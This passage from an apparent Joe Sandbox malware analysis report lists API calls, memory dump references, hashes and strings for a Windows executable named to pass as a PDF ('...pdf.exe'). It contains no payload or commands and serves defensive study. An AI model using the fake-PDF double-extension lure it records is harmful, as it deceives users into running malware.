                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                    • Instruction ID: 3f644fdd106e1ab94d9b7b1a4ff28047f9857eb9b1cb4b7a92225185e24a97ce
                    • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                    • Instruction Fuzzy Hash: 54C04C30254602EED7105B60DF0D7277950AB60741F11843AA546E21A0DA348415E92D
                    Function 00405D48 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040327C,00000000,0078B6D8,000000FF,0078B6D8,000000FF,000000FF,00000004,00000000), ref: 00405D5C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                    • Instruction ID: 7ae6caa888a0ef2d757d0491c4477122047cb4d8e5253970a61e6ecb635e967c
                    • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                    • Instruction Fuzzy Hash: 1AE0EC3221065EABDF109E659C08EEB7B6CEF05360F048437F925E2190E631E9219FA4
                    Function 00405D19 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032C6,00000000,00000000,0040310D,000000FF,00000004,00000000,00000000,00000000), ref: 00405D2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                    • Instruction ID: dfad6e071291888bd351353a7774b3a4efad1a63d4ecbc46eb9a9253763bc299
                    • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                    • Instruction Fuzzy Hash: 1FE0EC3225025AABDF509EA59C04EEB7B6CEF053A0F008837F915EA150D631E961DFE4
                    Function 004041D1 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                    • Instruction ID: 7158d61747e6cf692c847813075eb8e37c349a614b5667278bd1dade1c6ac8ad
                    • Opcode Fuzzy Hash: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                    • Instruction Fuzzy Hash: 5BC09BF97447017BDA108B519D49F1777586794700F1584297350F60D0CA74E550D61D
                    Function 004032C9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403049,?,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 004032D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                    • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                    • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                    • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                    Function 004041BA Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000028,?,00000001,00403FE6), ref: 004041C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                    • Instruction ID: 6c025a846befaa099d481c36b27a79c5fc7dd1f0b3caa6cf802aff4301849ee4
                    • Opcode Fuzzy Hash: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                    • Instruction Fuzzy Hash: 02B09236190A00BADA614B00EE09F457A62A7AC701F00C429B240240B0CAB200A0DB09
                    Function 004041A7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                    Download Yara Rule
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(?,00403F7F), ref: 004041B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                    • Instruction ID: 30bcdc9e1ec4e9f5bd758bba81a049f6052f636b6f7eedaabba742a71ce1d9c6
                    • Opcode Fuzzy Hash: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                    • Instruction Fuzzy Hash: 43A0113A008200AFCF028B80EF08C0ABB22ABE0300B22C038A28080030CB3208A0EB08

                    Non-executed Functions

                    Function 00405DF0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcpyW.KERNEL32(007A55C0,NUL), ref: 00405DFF
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F83,00000000,00000000), ref: 00405E23
                    • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405E2C
                      • Part of subcall function 00405BFB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0B
                      • Part of subcall function 00405BFB: lstrlenA.KERNEL32(00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C3D
                    • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405E49
                    • wsprintfA.USER32 ref: 00405E67
                    • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405EA2
                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405EB1
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405EE9
                    • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405F3F
                    • GlobalFree.KERNEL32(00000000), ref: 00405F50
                    • CloseHandle.KERNEL32(00000000), ref: 00405F57
                      • Part of subcall function 00405C96: GetFileAttributesW.KERNELBASE(00000003,00402EC2,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405C9A
                      • Part of subcall function 00405C96: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                    • String ID: %ls=%ls$NUL$[Rename]
                    • API String ID: 222337774-899692902
                    • Opcode ID: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                    • Instruction ID: 79fb1c0cee59ffd8bbd64a651f170d2e34830711ca13212973128761534bd4bd
                    • Opcode Fuzzy Hash: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                    • Instruction Fuzzy Hash: 56311270600B167BD2207B619D49F6B3B5CEF82754F14003ABA45F62D2EA7CD9058EAD
                    Function 00406355 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004032EC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 004063B8
                    • CharNextW.USER32(?,?,?,00000000), ref: 004063C7
                    • CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004032EC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 004063CC
                    • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004032EC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 004063DF
                    Strings
                    • "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe", xrefs: 00406355
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406356
                    • *?|<>/":, xrefs: 004063A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                    • API String ID: 589700163-3220920728
                    • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                    • Instruction ID: 3cdd18ac116859ddb672b661bfd00c9550f0de21ebdd483a5959fc1bc7d7dc3e
                    • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                    • Instruction Fuzzy Hash: 0011941580061295DB302B149D40FBBA2F8EF55764F56803FED8AB32C0E7BC5CA296ED
                    Function 004041EC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 00404209
                    • GetSysColor.USER32(00000000), ref: 00404225
                    • SetTextColor.GDI32(?,00000000), ref: 00404231
                    • SetBkMode.GDI32(?,?), ref: 0040423D
                    • GetSysColor.USER32(?), ref: 00404250
                    • SetBkColor.GDI32(?,?), ref: 00404260
                    • DeleteObject.GDI32(?), ref: 0040427A
                    • CreateBrushIndirect.GDI32(?), ref: 00404284
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                    • Instruction ID: 1aa763bcd1536a717e50237d4e11ffd777efd381c4440c982bb19b0576d7b9c9
                    • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                    • Instruction Fuzzy Hash: DA219671500704ABCB219F78DD08B5B7BF8AF81754F04896DF995E22A0D734E908CB64
                    Function 00402D98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                    Download Yara Rule
                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
                    • MulDiv.KERNEL32(000E2E62,00000064,000E4700), ref: 00402DE1
                    • wsprintfW.USER32 ref: 00402DF1
                    • SetWindowTextW.USER32(?,?), ref: 00402E01
                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E13
                    Strings
                    • verifying installer: %d%%, xrefs: 00402DEB
                    Memory Dump Source
